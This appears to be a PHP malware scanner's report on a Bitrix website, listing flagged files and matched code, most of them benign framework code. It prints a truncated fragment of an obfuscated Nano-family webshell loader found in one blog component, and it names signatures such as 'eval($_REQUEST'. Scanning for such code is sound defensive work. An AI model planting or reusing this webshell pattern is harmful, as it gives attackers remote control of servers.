/var/www/kievflotq/kievflot.ua/bitrix/index.php Size: 83.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:42 Dangers: 1
| Description | Match |
|---|
Sign 0f37c730 Line: 2 Dangerous Malware Signature (hash: 0f37c730) |
meta http-equiv="REFRESH" content="0;
|
|
/var/www/kievflotq/kievflot.ua/bitrix/wizards/bitrix/demo/scripts/template.php Size: 15.72 kB Created: 2017-05-21 22:21:52 Modified: 2023-06-30 13:57:55 Warns: 1
| Description | Match |
|---|
Function eval Line: 462 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(response);
}
CAjaxForm.prototype.ShowError = function(errorMessage)
{
var errorContainer = document.getElementById("error_container");
var errorText = document.getElementById("error_text");
if (!errorContainer || !errorText)
return;
var waitWindow = document.getElementById("wait");
if (waitWindow)
waitWindow.style.display = "none";
errorContainer.style.display = 'block';
errorText.innerHTML = strip_tags(errorMessage);
var retryButton = ...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/download/download_private/download_private.php Size: 3.71 kB Created: 2017-05-21 22:21:53 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/download/download_balance.php Size: 3.00 kB Created: 2017-05-21 22:21:53 Modified: 2023-06-30 13:57:54 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/download/download.php Size: 2.09 kB Created: 2017-05-21 22:21:53 Modified: 2023-06-30 13:57:54 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/backup/index.php Size: 80.00 B Created: 2017-06-11 00:13:59 Modified: 2023-06-30 13:57:47 Dangers: 1
| Description | Match |
|---|
Sign 0f37c730 Line: 1 Dangerous Malware Signature (hash: 0f37c730) |
meta http-equiv="REFRESH" content="0;
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.post.form/templates/.default/template.php Size: 16.90 kB Created: 2017-11-21 16:20:28 Modified: 2023-06-30 13:57:48 Dangers: 3
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.map/component.php Size: 5.85 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 157 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$full_path.".section.php")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ".$CONDITION.";"))) continue; } $search_child = false; $search_path = ''; $full_path = ''; if ($aMenu[1] <> '') { if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i", $aMenu[1])) { $full_path = $aMenu[1]; } else { $full_path = trim(Rel2Abs(substr($PARENT_PATH, strlen($_SERVER["DOCUMENT_ROOT"])), $aMenu[1])); $slash_pos = strrpos($full_path, "/"); if ($slash_pos !== false) { $page = substr($full_path, $slash_pos+1); if(($pos = strpos($page, '?')) !== false) $page = substr($page,...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.link.list/component.php Size: 1.14 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 19 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FN}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.interface.grid/component.php Size: 9.39 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a["name"], $b["name"]);'); uasort($aOptions["views"], $func); $arResult["OPTIONS"] = $aOptions; $arResult["GLOBAL_OPTIONS"] = CUserOptions::GetOption("main.interface", "global", array(), 0); if($arParams["USE_THEMES"]) { if($arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID] <> '') $arResult["GLOBAL_OPTIONS"]["theme"] = $arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID]; if($arResult["OPTIONS"]["theme"] == '') $arResult["OPTIONS"...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/b24connector.button.list/ajax.php Size: 3.73 kB Created: 2017-11-21 16:21:54 Modified: 2023-06-30 13:57:48 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { $this->request = Context::getCurrent()->getRequest(); $this->action = $this->request->get('action'); $this->prepareRequestData(); if($this->check()) { call_user_func_array($this->getActionCall(), array($this->requestData)); } $this->giveResponse(); } } $controller = new B24CButtonListAjaxController(); $controller->exec()
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.post.edit/templates/.default/script.php Size: 26.06 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Warns: 1
| Description | Match |
|---|
Function eval Line: 140 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(thetag + "_open");
if (tagOpen == 0)
{
if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
{
eval(thetag + "_open = 1");
// Change the button status
pushstack(bbtags, thetag);
cstat();
}
}
else
{
// Find the last occurance of the opened tag
lastindex = 0;
for (i = 0 ; i < bbtags.length; i++ )
{
if ( bbtags[i] == thetag )
{
lastindex = i;
}
}
// Close all tags opened up to that tag was opened
while (bbtags[lastindex])
{
tagR...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.post.edit/templates/.default/template.php Size: 21.63 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.post.edit/templates/micro/template.php Size: 4.16 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.ui.grid/templates/.default/template.php Size: 31.21 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:49 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(<?=CUtil::phpToJSObject($arResult["DATA_FOR_EDIT"])?>);
var defaultColumns = eval(<?=CUtil::phpToJSObject($arResult["DEFAULT_COLUMNS"])?>);
var Grid = BX.Main.gridManager.getById('<?=$arParams["GRID_ID"]?>');
var messages = eval(<?=CUtil::phpToJSObject($arResult["MESSAGES"])?>);
Grid = Grid ? Grid.instance : null;
if (Grid)
{
Grid.arParams.DEFAULT_COLUMNS = defaultColumns;
Grid.arParams.MESSAGES = messages;
if (action !== 'more')
{
Grid.arParams.EDITABLE_DATA ...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.filter/component.php Size: 32.43 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 61 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FILTER_NAME}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.smart.filter/component.php Size: 27.62 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 523 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FILTER_NAME}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.element/templates/old_version_16/template.php Size: 40.01 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
| Description | Match |
|---|
Exploit clever_include Line: 708 Dangerous LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
"CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
"BASKET_URL" => $arParams["BASKET_URL"],
"ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
"PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
"PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
"USE_PRODUCT_QUANTITY" => 'N',
"OFFER_TREE_PROPS_{$arResult['OFFERS_IBLOCK']}" => $arParams['OFFER_TREE_PROPS'],
"CART_PROPERTIES_{...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.element/templates/.default/template.php Size: 64.84 kB Created: 2017-11-21 16:21:43 Modified: 2023-06-30 13:57:48 Dangers: 1
| Description | Match |
|---|
Exploit clever_include Line: 1114 Dangerous LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
INCLUDE' => $arParams['PRICE_VAT_INCLUDE'],
'CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'],
'BASKET_URL' => $arParams['BASKET_URL'],
'ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'],
'PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'],
'PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'],
'USE_PRODUCT_QUANTITY' => 'N',
'PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.user.link/component.php Size: 19.17 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:49 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/forum.rules/lang/en/component.php Size: 4.71 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Dangers: 1
| Description | Match |
|---|
Sign 407651f7 Line: 27 Dangerous Malware Signature (hash: 407651f7) |
warez
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.sections.top/component.php Size: 19.13 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 180 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/scripts_for_editor.php Size: 14.80 kB Created: 2017-11-21 16:21:44 Modified: 2023-06-30 13:57:48 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(scripts[s].JS);
}
}
BX.ajax.processScripts(scripts, true);
// commentEr object may be set in template
if(window.commentEr && window.commentEr == "Y")
{
BX('err_comment_'+this.id[1]).innerHTML = data;
}
else
{
if(BX('edit_id').value > 0)
{
var commentId = 'blg-comment-'+this.id[1];
if(BX(commentId))
{
var newComment = BX.create('div',{'html':data}); // tmp container for data
// paste resp...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/template.php Size: 31.88 kB Created: 2017-11-21 16:21:43 Modified: 2023-06-30 13:57:48 Dangers: 3
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.new_blogs/.php Size: 56.68 kB Created: 2017-05-21 22:21:47 Modified: 2024-02-21 05:07:06 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit nano Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y[2 ]($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y[ 3]($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y[ 5] ($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y[1]( " Q8s+l+NXDI9CN1Q0LfSoD1xXmJmSFpgBlmKsFl2noZ/HWCmmJ0zsIHsTuV6mSLbzgOhjSHgxY/5vvVSGhK4/shr/H3SKGZcYvDv8qJOww3c3Zwn1sohqayJa8cpjLa87PVrljxohgsPe/fsFb/pn9xcxv2Zc3oJ2Bn8A5EeoZl+TaOw0Nj2Uv2gYHuyvSQbjIPjrpkNKrxxWCtkjzftSWWLlpT9yuUriPZ4R6V8M9I/v7KF6fPpFPQPdFwVLaVB9fEfM8KvZPe3c3AMuDBruSujZxjz20EXBSKRapZOxyM229uEXHxmW8//KkszwSfo6bfqSzHUYnvwHTsDtwFHv4...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
EVaL ($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y[2 ]($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y[ 3]($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y[ 5] ($mwqgm3gtnkndnyyjmwe2m4edoxkdzjn2y[1]( ""."
Q8s+l+NXDI9CN1Q0LfSoD1xXmJmSFpgBlmKsFl2noZ/HWCmmJ0zsIHsTuV6mSLbzgO" ."hjSHgxY/5vvVSGhK4/shr/H3SKGZcYvDv8qJOww3c3Zwn1sohqayJa8cpjLa87PVrljxohgsPe/fsFb/pn9xcxv2Zc3oJ2Bn8A5EeoZl+TaOw0Nj2Uv2gYHuyvSQbjIPjrpkNKrxxWCtkjzftSWWLlpT9yuUriPZ4R6V8M9I/v7KF6fPpFPQPdFwVLaVB9fEfM8KvZPe3c3AMuDBruSujZxjz20EXBSKRapZOxyM2"."29uEXHxmW8//KkszwSfo6bfqS...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.popular_blogs/component.php Size: 5.77 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["VIEWS"] == $b["VIEWS"]) { if($a["NUM_COMMENTS"] < $b["NUM_COMMENTS"]) return 1; elseif($a["NUM_COMMENTS"] > $b["NUM_COMMENTS"]) return -1; else return 0;} return ($a["VIEWS"] < $b["VIEWS"])? 1 : -1;')); $i = 0; foreach($arBlogs as $blogID => $info) { if($i >= $arParams["BLOG_COUNT"] && IntVal($arParams["BLOG_COUNT"]) > 0) continue; $arBlog = CBlog::GetByID($blogID); $arBlog = CBlogTools::htmlspecialcharsExArray($arBlog); $arBlog["BlogUser"] = CBlogUser::GetByID(...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery.detail.list/templates/slider_big/template.php Size: 16.32 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:49 Warns: 1
| Description | Match |
|---|
Function eval Line: 338 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("div.onclick = function(e){jsUtils.PreventDefault(e); jsUtils.Redirect([], '" + res[ii].href + "');};");
res[ii].parentNode.insertBefore(div, res[ii]);
res[ii].onmouseover = function()
{
this.previousSibling.onshow();
this.bxMouseOver = 'Y';
};
res[ii].onmouseout = function()
{
this.bxMouseOver = 'N';
var __this = this;
setTimeout(
function()
{
if (__this.previousSibling && __this.previousSibling.bxMouseOver != "Y")
{
__this.previousSibling...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery.detail.list.ex/templates/.default/bitrix/blog.post.comment/photogallery/template.php Size: 19.20 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:49 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery.detail.list.ex/templates/.default/template.php Size: 12.64 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:49 Warns: 1
| Description | Match |
|---|
Exploit infected_comment Line: 110 Warning Comments composed by 5 random chars usually used to detect if a file is infected yet |
/*width*/
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/script.php Size: 22.93 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
| Description | Match |
|---|
Function eval Line: 97 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(thetag + "_open");
if (tagOpen == 0)
{
if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
{
eval(thetag + "_open = 1");
// Change the button status
pushstack(bbtags, thetag);
cstat();
}
}
else
{
// Find the last occurance of the opened tag
lastindex = 0;
for (i = 0 ; i < bbtags.length; i++ )
{
if ( bbtags[i] == thetag )
{
lastindex = i;
}
}
// Close all tags opened up to that tag was opened
while (bbtags[lastindex])
{
tagR...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/template.php Size: 23.20 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/script.php Size: 11.35 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(thetag + "_open");
if (tagOpen == 0)
{
if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
{
eval(thetag + "_open = 1");
// Change the button status
pushstack(bbtags, thetag);
cstat();
}
}
else
{
// Find the last occurance of the opened tag
lastindex = 0;
for (i = 0 ; i < bbtags.length; i++ )
{
if ( bbtags[i] == thetag )
{
lastindex = i;
}
}
// Close all tags opened up to that tag was opened
while (bbtags[lastindex])
{
tagR...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/template.php Size: 20.56 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_old_version/bitrix/blog.post.comment/.default/template.php Size: 20.97 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/forum.topic.list/component.php Size: 23.88 kB Created: 2017-05-21 22:21:47 Modified: 2023-06-30 13:57:48 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 244 Warning Double var technique is usually used for the obfuscation of malicious code |
${$PAGEN_NAME}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php Size: 9.46 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:49 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("var result = " + data + "; "); }
if (result['status'] == 'inprogress')
{
document.getElementById('photogallery_recalc').innerHTML = result['text'];
if (__this_source.bReady == false)
{
document.getElementById('ButtonPhotoGalleryRecalcStart').disabled = false;
document.getElementById('ButtonPhotoGalleryRecalcContinue').disabled = false;
document.getElementById('ButtonPhotoGalleryRecalcStop').disabled = true;
}
else
{
document.getElementById(...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery/templates/.default/bitrix/blog.post.comment/photogallery/template.php Size: 30.32 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:49 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/mobileapp.menu/templates/.default/template.php Size: 12.57 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:49 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec("showAuthForm");
}
}
<?endif;?>
if(BX.PULL)
{
BX.addCustomEvent("onPullExtendWatch", function(data) {
BX.PULL.extendWatch(data.id);
});
BX.addCustomEvent("thisPageWillDie", function(data) {
BX.PULL.clearWatch(data.page_id);
});
BX.addCustomEvent("onPullEvent", function (module_id, command, params)
{
if (module_id == 'main' && (command == 'user_authorize' || command == 'user_logout' || command == 'online_list'))
{
//app.onCustomEvent('onPullOnline', {...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/forum.topic.active/component.php Size: 18.38 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 11 Warning Double var technique is usually used for the obfuscation of malicious code |
${$s}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/rss.show/component.php Size: 2.52 kB Created: 2017-05-21 22:21:47 Modified: 2023-06-30 13:57:49 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('&$val, $key', '$val=htmlspecialcharsex($val);')); elseif($arParams["PROCESS"] == "TEXT") array_walk_recursive($arResult, create_function('&$val, $key', '$val=str_replace(array(" ", "\\r\\n"), array(" ", "<br>"), HTMLToTxt($val));')); $this->IncludeComponentTemplate()
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.post.comment/templates/.default/template.php Size: 30.38 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog/templates/old_version_16/bitrix/catalog.element/.default/template.php Size: 40.07 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
| Description | Match |
|---|
Exploit clever_include Line: 713 Dangerous LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
"CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
"BASKET_URL" => $arParams["BASKET_URL"],
"ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
"PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
"PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
"USE_PRODUCT_QUANTITY" => 'N',
"OFFER_TREE_PROPS_{$arResult['OFFERS_IBLOCK']}" => $arParams['OFFER_TREE_PROPS'],
"CART_PROPERTIES_{...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog/templates/old_version_16/section.php Size: 2.44 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog/templates/old_version_16/section_vertical.php Size: 19.71 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
| Description | Match |
|---|
Exploit clever_include Line: 44 Dangerous LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
include",
"",
Array(
"AREA_FILE_SHOW" => "file",
"PATH" => $arParams["SIDEBAR_PATH"],
"AREA_FILE_RECURSIVE" => "N",
"EDIT_MODE" => "html",
),
false,
array('HIDE_ICONS' => 'Y')
);?>
<?endif?>
</div>
<?endif?>
<div class="<?=(($isFilter || $isSidebar) ? "col-md-9 col-sm-8 col-sm-pull-4 col-md-pull-3" : "col-xs-12")?>">
<div class="row">
<div class="col-xs-12">
<?
if(ModuleManager::isModuleInstalled("sale"))
{
$arRecomData = array();
$recomC...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog/templates/.default/section.php Size: 2.44 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/forum.index/component.php Size: 18.80 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 111 Warning Double var technique is usually used for the obfuscation of malicious code |
${$PAGEN_NAME}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/cache/s1/bitrix/catalog.section/f0/f07dce8c4e2dc4854bf9f47be3173581.php Size: 58.42 kB Created: 2024-03-03 10:42:43 Modified: 2024-03-03 10:42:43 Dangers: 1
| Description | Match |
|---|
Sign 34b7e999 Line: 433 Dangerous Malware Signature (hash: 34b7e999) |
dMT0JBTF
|
|
/var/www/kievflotq/kievflot.ua/bitrix/cache/s1/bitrix/catalog.section/60/6021ba8a3c2d97491c48a0378e94ed76.php Size: 485.50 kB Created: 2024-03-03 11:07:45 Modified: 2024-03-03 11:07:45 Dangers: 1
| Description | Match |
|---|
Sign 34b7e999 Line: 4083 Dangerous Malware Signature (hash: 34b7e999) |
dMT0JBTF
|
|
/var/www/kievflotq/kievflot.ua/bitrix/cache/s1/bitrix/catalog.section/18/184039ea1c1c3bed2beda7474c15ea8e.php Size: 485.83 kB Created: 2024-03-03 11:07:46 Modified: 2024-03-03 11:07:46 Dangers: 1
| Description | Match |
|---|
Sign 34b7e999 Line: 4083 Dangerous Malware Signature (hash: 34b7e999) |
dMT0JBTF
|
|
/var/www/kievflotq/kievflot.ua/bitrix/cache/s1/bitrix/catalog.section/eb/eb7c928b63ac38019b21db6a0593fe64.php Size: 70.29 kB Created: 2024-03-03 10:42:12 Modified: 2024-03-03 10:42:12 Dangers: 1
| Description | Match |
|---|
Sign 34b7e999 Line: 531 Dangerous Malware Signature (hash: 34b7e999) |
dMT0JBTF
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/user.php Size: 7.37 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 197 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($f, "<?include(\$_SERVER[\"DOCUMENT_ROOT\"].\"/bitrix/modules/security/options_user_settings_1.php\")
| Exploit execution Line: 197 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include(\$_SERVER[\"DOCUMENT_ROOT\"].\"/bitrix/modules/security/options_user_settings_1.php\")
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/post_filter.php Size: 7.08 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
| Description | Match |
|---|
Exploit download_remote_code2 Line: 162 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($f, "\n------------------------------\n\$_SERVER:\n")
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/antivirus.php Size: 44.22 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
| Description | Match |
|---|
Exploit download_remote_code2 Line: 528 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($f, "\n------------------------------\n\$_SERVER:\n")
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/system_information.php Size: 8.31 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/iprule.php Size: 30.43 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/tests/environment.php Size: 13.68 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($uid); return sprintf('%s(%s)', $uid['name'], $uid['uid']); } return $uid; } protected static function formatGID($gid) { if(is_callable("posix_getgrgid")) { $gid = posix_getgrgid($gid); return sprintf('%s(%s)', $gid['name'], $gid['gid']); } return $gid; } protected static function formatFilePermissions($perms) { if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($per...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/event.php Size: 5.49 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function syslog Warning Potentially dangerous function `syslog` [https://www.php.net/syslog] |
syslog($this->syslogPriority, $message); } if ($this->isFileEngineActive) { if (!$message) $message = $this->messageFormatter->format($auditType, $itemName, $itemDescription); $message = static::sanitizeMessage($message); $message .= "\n"; $savedInFile = file_put_contents($this->filePath, $message, FILE_APPEND) > 0; } return ($savedInDB || $savedInSyslog || $savedInFile); } public static function getSyslogPriorities() { return static::$syslogPriorities; } public static function getSyslogFaciliti...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/security/install/index.php Size: 10.92 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/security/lang/ru/admin/security_antivirus.php Size: 3.09 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
| Description | Match |
|---|
Exploit file_prepend Line: 12 Dangerous LFI (Local File Inclusion), prepending a file at the bottom of every others PHP files, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
php_value auto_prepend_file
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/security/lang/en/classes/general/tests/environment.php Size: 5.08 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
| Description | Match |
|---|
